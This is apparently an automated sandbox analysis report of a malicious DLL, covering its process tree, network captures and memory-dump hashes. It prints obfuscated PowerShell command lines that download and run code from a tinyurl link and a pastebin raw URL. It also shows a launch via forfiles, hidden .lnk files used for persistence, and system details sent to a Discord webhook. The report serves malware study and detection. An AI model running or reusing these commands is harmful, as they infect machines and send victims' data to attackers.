2024-10-15 14:00:56 UTC | 311 | OUT | POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Content-Type: application/json
    Host: discord.com
    Content-Length: 302
    Connection: Keep-Alive
2024-10-15 14:00:56 UTC | 302 | OUT | Data Ascii:
    {
        "content":  "================================\n**user** system online\n\n**GPU:** AG11AP66\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UA
2024-10-15 14:00:56 UTC | 1255 | IN | HTTP/1.1 404 Not Found
    Date: Tue, 15 Oct 2024 14:00:56 GMT
    Content-Type: application/json
    Content-Length: 45
    Connection: close
    Cache-Control: public, max-age=3600, s-maxage=3600
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1729000858
    x-ratelimit-reset-after: 1
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6y58N4G5xhAgAclsfELCL4vYMRL1dKLmEvZXbltV4xX19%2FhCtyXpYRGPBjcKQ5TtSYREctGH3loQD%2BPgaBAbSgrIHIQuhaS4fs00DsgobwUohjmmH%2BmdDlm2kXPO"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Set-Cookie: __cfruid=d07a2d7a7b163eb2bc363103be6664bc28dedd8c-1729000856; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: _cfuvid=Ocy6fJkJWJMC268ZWVFfxA560vcYtEIVLj3zT5Ch5e4-1729000856906-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 8d30569aef302e4f-DFW
2024-10-15 14:00:56 UTC | 45 | IN | Data Ascii: {"message": "Unknown Webhook", "code": 10015}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.7 | 52206 | 162.159.128.233 | 443 | 4240 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-15 14:01:03 UTC | 311 | OUT | POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Content-Type: application/json
    Host: discord.com
    Content-Length: 302
    Connection: Keep-Alive
                                                                 2024-10-15 14:01:03 UTC | 302 | OUT | Data Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 66 72 6f 6e 74 64 65 73 6b 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 41 47 31 31 41 50 36 36 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41
                                                                Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** AG11AP66\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UA
                                                                 2024-10-15 14:01:03 UTC | 1249 | IN | HTTP/1.1 404 Not Found
                                                                Date: Tue, 15 Oct 2024 14:01:03 GMT
                                                                Content-Type: application/json
                                                                Content-Length: 45
                                                                Connection: close
                                                                Cache-Control: public, max-age=3600, s-maxage=3600
                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                x-ratelimit-limit: 5
                                                                x-ratelimit-remaining: 4
                                                                x-ratelimit-reset: 1729000864
                                                                x-ratelimit-reset-after: 1
                                                                via: 1.1 google
                                                                alt-svc: h3=":443"; ma=86400
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8LReTUnDSklWN7n3iLQZ47m8pDvQX5LtLL8aaRSBCMArXkzeFEPdeyEIZYkR8FZknc4iaJ7BLYKWhcNSOWj1wHubkLuzLZuu6bRaQEdruclb7HAj2SnqHt5lz3i5"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                X-Content-Type-Options: nosniff
                                                                Set-Cookie: __cfruid=19b26d61e8d421bc0ea94327663eea862e775528-1729000863; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                Set-Cookie: _cfuvid=sM1EwP2ChVVZeJ5tLOr_.50bQMwiRTG113ZViG8DWmM-1729000863431-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                Server: cloudflare
                                                                CF-RAY: 8d3056c3cf0ae82f-DFW
                                                                 2024-10-15 14:01:03 UTC | 45 | IN | Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                Target ID:0
                                                                Start time:10:00:02
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\loaddll64.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:loaddll64.exe "C:\Users\user\Desktop\5UIy3bo46y.dll"
                                                                Imagebase:0x7ff719d70000
                                                                File size:165'888 bytes
                                                                MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:1
                                                                Start time:10:00:02
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:3
                                                                Start time:10:00:03
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5UIy3bo46y.dll",#1
                                                                Imagebase:0x7ff699860000
                                                                File size:289'792 bytes
                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:4
                                                                Start time:10:00:03
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:regsvr32.exe /s C:\Users\user\Desktop\5UIy3bo46y.dll
                                                                Imagebase:0x7ff7eaa10000
                                                                File size:25'088 bytes
                                                                MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:5
                                                                Start time:10:00:03
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\rundll32.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:rundll32.exe "C:\Users\user\Desktop\5UIy3bo46y.dll",#1
                                                                Imagebase:0x7ff7279f0000
                                                                File size:71'680 bytes
                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:6
                                                                Start time:10:00:03
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\rundll32.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:rundll32.exe C:\Users\user\Desktop\5UIy3bo46y.dll,DllRegisterServer
                                                                Imagebase:0x7ff7279f0000
                                                                File size:71'680 bytes
                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:7
                                                                Start time:10:00:03
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
                                                                Imagebase:0x7ff741d30000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:8
                                                                Start time:10:00:03
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
                                                                Imagebase:0x7ff741d30000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:9
                                                                Start time:10:00:03
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
                                                                Imagebase:0x7ff741d30000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:10
                                                                Start time:10:00:03
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:11
                                                                Start time:10:00:03
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:12
                                                                Start time:10:00:03
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:13
                                                                Start time:10:00:06
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
                                                                Imagebase:0x7ff741d30000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:15
                                                                Start time:10:00:35
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\attrib.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                Imagebase:0x7ff6ef590000
                                                                File size:23'040 bytes
                                                                MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:16
                                                                Start time:10:00:35
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\attrib.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                Imagebase:0x7ff6ef590000
                                                                File size:23'040 bytes
                                                                MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:17
                                                                Start time:10:00:37
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\forfiles.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                Imagebase:0x7ff6e4060000
                                                                File size:52'224 bytes
                                                                MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:18
                                                                Start time:10:00:37
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:19
                                                                Start time:10:00:38
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                Imagebase:0x7ff741d30000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:20
                                                                Start time:10:00:38
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                Imagebase:0x7ff741d30000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:21
                                                                Start time:10:00:45
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\forfiles.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                Imagebase:0x7ff6e4060000
                                                                File size:52'224 bytes
                                                                MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:22
                                                                Start time:10:00:45
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:23
                                                                Start time:10:00:45
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                Imagebase:0x7ff741d30000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:24
                                                                Start time:10:00:46
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                Imagebase:0x7ff741d30000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1773701094.00007FFAAB530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB530000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaab530000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1193ae7178a3b45df91d4280b6f157b289fa783dae3635844a93ea9bbfdffaa2
                                                                  • Instruction ID: ff9218cae400134bbbe6d74760be25495bba7fd1a27eb8f9517f1d3d54b6ac42
                                                                  • Opcode Fuzzy Hash: 1193ae7178a3b45df91d4280b6f157b289fa783dae3635844a93ea9bbfdffaa2
                                                                  • Instruction Fuzzy Hash: 0FF1C531909A4E8FEBA8DF28C8557E937D1FB55310F04826EE84EC72D2DF3999458B81
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1773701094.00007FFAAB530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB530000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaab530000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0750fa308c486a19308b1147600e32f491b9c25670618211b40d80de7dc21a9c
                                                                  • Instruction ID: 74c9a30db909b6a9925921eed1b92be0f52478a929a6bfb503e2b8656ff6ae58
                                                                  • Opcode Fuzzy Hash: 0750fa308c486a19308b1147600e32f491b9c25670618211b40d80de7dc21a9c
                                                                  • Instruction Fuzzy Hash: D3E1E770909A4E8FEBA8DF28C8657E977D1FB55310F04826ED84EC7292CF78994587C1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1773701094.00007FFAAB530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB530000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaab530000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6A$0WK
                                                                  • API String ID: 0-842960117
                                                                  • Opcode ID: 5fa29f41abcfa138d18f0c5b2356c649d767f6c036b977eb84342bc0969edcdf
                                                                  • Instruction ID: bd85ad47a018b28d846f743e899cabe7395739e50cffed4acc6c7e5e952dea16
                                                                  • Opcode Fuzzy Hash: 5fa29f41abcfa138d18f0c5b2356c649d767f6c036b977eb84342bc0969edcdf
                                                                  • Instruction Fuzzy Hash: 8E71E571A1CF4A8BE758DBA898656B877D1EF49340F0441BDE44EC73E3CE28AC068781
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1777971003.00007FFAAB600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB600000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaab600000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8870b5fcc82fc6e0bbb81ec4eab6c9a2a7a71a68ea3c386a4598fc0deaba44a5
                                                                  • Instruction ID: c0116308d905c6e1e247c8a8111b5a6e8d5f2cadcaf806965e50c36572cffe2f
                                                                  • Opcode Fuzzy Hash: 8870b5fcc82fc6e0bbb81ec4eab6c9a2a7a71a68ea3c386a4598fc0deaba44a5
                                                                  • Instruction Fuzzy Hash: 66C1897290EA8A8FE7E5A76988155B57FD0FF1B351B1480FED04CC70E3DA28990983D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1773701094.00007FFAAB530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB530000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaab530000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d529afc0068f239c11211f8f9ffad8a1e511aa30c24029691b051c83793e01c1
                                                                  • Instruction ID: b3a2c3cc7fdb7de7ebcff03066c60cfce084de093dc011748cee14e62f18cc84
                                                                  • Opcode Fuzzy Hash: d529afc0068f239c11211f8f9ffad8a1e511aa30c24029691b051c83793e01c1
                                                                  • Instruction Fuzzy Hash: 54B1B77150DB4E8FEBA8DF28D8557E93BD1FF56350F04826EE44EC7292CA3498458B82
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1777971003.00007FFAAB600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB600000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaab600000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 24ff18d100b335aea00cc822db7245cb909706f1a397c928ec3742e255d804f0
                                                                  • Instruction ID: 0be06453a1783fc5559cf1c6becce34bc9a4c6f99e25d085e3a1b0f78c422aa7
                                                                  • Opcode Fuzzy Hash: 24ff18d100b335aea00cc822db7245cb909706f1a397c928ec3742e255d804f0
                                                                  • Instruction Fuzzy Hash: 7E714562E0FA868FE7E5976948515787AD0FF5B386B1890FED04DC70E3DA289C4883D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1777971003.00007FFAAB600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB600000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaab600000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3791026db95ed281a4413650e749ac010cdf20aaba040a5c48b5c1c75a763c1c
                                                                  • Instruction ID: bc565b973c39d42e7704970604fe09c20eaae6cf9ba0068a7015056671f037d9
                                                                  • Opcode Fuzzy Hash: 3791026db95ed281a4413650e749ac010cdf20aaba040a5c48b5c1c75a763c1c
                                                                  • Instruction Fuzzy Hash: 71715622E0FB868FE7E5976948515787AD0FF5A386B1880FED04DC70E3DA289D0883C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1777971003.00007FFAAB600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB600000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaab600000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d03547dee0f810bb1965689eab828e5e5cdfaa8fc4c8c94c9859bc571a7cfc49
                                                                  • Instruction ID: 9754f0069397295a774b565d085062a3a42ffcd933b914e28eeaf7c05d80631d
                                                                  • Opcode Fuzzy Hash: d03547dee0f810bb1965689eab828e5e5cdfaa8fc4c8c94c9859bc571a7cfc49
                                                                  • Instruction Fuzzy Hash: 4C416832B0DA4A8FEBD5DB6C94516B8B7D1FF5A251B1881BFC04DC7193DE29980683C0
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1773701094.00007FFAAB530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB530000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaab530000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 01863beffccecdac952bb66060b6da2fd7c0e87ed23d709a93eb3962f81cd5da
                                                                  • Instruction ID: 71a449082d71bb01938c81449b982e81deee456929fa74809478d01e7b7e267e
                                                                  • Opcode Fuzzy Hash: 01863beffccecdac952bb66060b6da2fd7c0e87ed23d709a93eb3962f81cd5da
                                                                  • Instruction Fuzzy Hash: 8C310C3081A68ECEFBB49F18CC56BF93295FF46355F408539D40E862E3CA396949CB51
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1773701094.00007FFAAB530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB530000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaab530000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d7e388c9c1aa2da16b7bf61c8e47a240d31d87d9b7102306f216c870d2d97c13
                                                                  • Instruction ID: d59fa181b92aee70398de55fb4e107e74c9b36927c3bfa9fd364fac501382c1d
                                                                  • Opcode Fuzzy Hash: d7e388c9c1aa2da16b7bf61c8e47a240d31d87d9b7102306f216c870d2d97c13
                                                                  • Instruction Fuzzy Hash: 8701F58489F2C79ED743677458249B37FA88E8316570C45FFE0D9CA0A7E848095AC393
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1773701094.00007FFAAB530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB530000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaab530000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                  • Instruction ID: bb17bfe6053036c8337829b34fb131fec9f0c0d2ee04dbd79a017af912e10143
